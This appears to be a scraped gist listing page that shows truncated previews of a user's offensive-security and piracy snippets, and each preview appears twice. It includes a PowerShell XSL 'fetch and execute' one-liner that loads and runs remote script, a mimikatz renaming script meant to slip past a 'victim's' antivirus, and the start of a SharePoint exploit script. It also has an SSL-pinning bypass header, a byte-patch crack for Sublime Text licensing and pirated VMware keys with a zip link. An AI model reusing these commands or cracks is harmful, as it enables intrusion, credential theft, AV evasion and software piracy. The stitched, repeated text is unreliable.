Faisal Fs ⚔️ faisalfs10x

## SharePwn_public.py
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

## misirakyat.js
// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa

const crypto = require('crypto');
const print = console.log

function getTimestamp(data) {
	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
	let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5");
	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
	let decrypted = Buffer.concat([

## README.md

      
              1 file
            
          
              17 forks
            
          
              35 comments
            
          
              57 stars
            
          
                marcpinet
                / README.md
            
            
              Last active
              April 13, 2024 17:11
            
              
                Activate Sublime Text 4 Build 4143 and below for ever (also maybe above, but not yet tried) 
              
          
    Activate Sublime Text (for ever)


Go to https://hexed.it/
Click Open File in the top left corner and select sublime_text.exe
Press CTRL + F or on the Search for bar in the left panel  and look for: 80 78 05 00 0f 94 C1
Now in the editor, click on the first byte (80) and start replacing each byte by: C6 40 05 01 48 85 C9
Finally, in the top left corner again, click on Save as and replace the old executable file with the newly created one.

Enjoy an Unlimited User License!

  
## mixunpin.js
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

## vmwk17key.txt
Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus

## dante_proxy.sh
#!/bin/sh

echo_status(){
    TEXT=$1
    echo "\n $(tput setaf 1)>>>> $(tput setab 7) $TEXT $(tput sgr 0)"
}

SOKSPROXY_PASS=$(openssl rand -base64 12)

echo_status "Updating System and installing dante-server"

## final_code.py
import requests
from bs4 import BeautifulSoup
import queue
from threading import Thread

starting_url = 'https://scrapeme.live/shop/page/1/'
visited = set()
max_visits = 100 # careful, it will crawl all the pages
num_workers = 5
data = []

## PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

## init.sls
sshuttle:
    pkg.installed: []

    group.present:
        - gid: 2024
    user.present:
        - fullname: sshuttle
        - uid: 2024
        - gid: 2024
        - allow_uid_change: True
	# -- coding: utf-8 --
	import hashlib
	import base64
	import requests, string, struct, uuid, random, re
	import sys
	from collections import OrderedDict
	from sys import version
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
	// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa

	const crypto = require('crypto');
	const print = console.log

	function getTimestamp(data) {
	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
	let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5");
	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
	let decrypted = Buffer.concat([
	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
	Install VMWare Workstation PRO 17 (Read it right. PRO!)
	Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

	Sub to me on youtube pls - PurpleVibe32
	if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
	---
	This gist can get off at any time.
	PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
	*If you have a problem comment and people will try to help you!
	*No virus
	#!/bin/sh

	echo_status(){
	TEXT=$1
	echo "\n $(tput setaf 1)>>>> $(tput setab 7) $TEXT $(tput sgr 0)"
	}

	SOKSPROXY_PASS=$(openssl rand -base64 12)

	echo_status "Updating System and installing dante-server"
	import requests
	from bs4 import BeautifulSoup
	import queue
	from threading import Thread

	starting_url = 'https://scrapeme.live/shop/page/1/'
	visited = set()
	max_visits = 100 # careful, it will crawl all the pages
	num_workers = 5
	data = []
	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
	sshuttle:
	pkg.installed: []

	group.present:
	- gid: 2024
	user.present:
	- fullname: sshuttle
	- uid: 2024
	- gid: 2024
	- allow_uid_change: True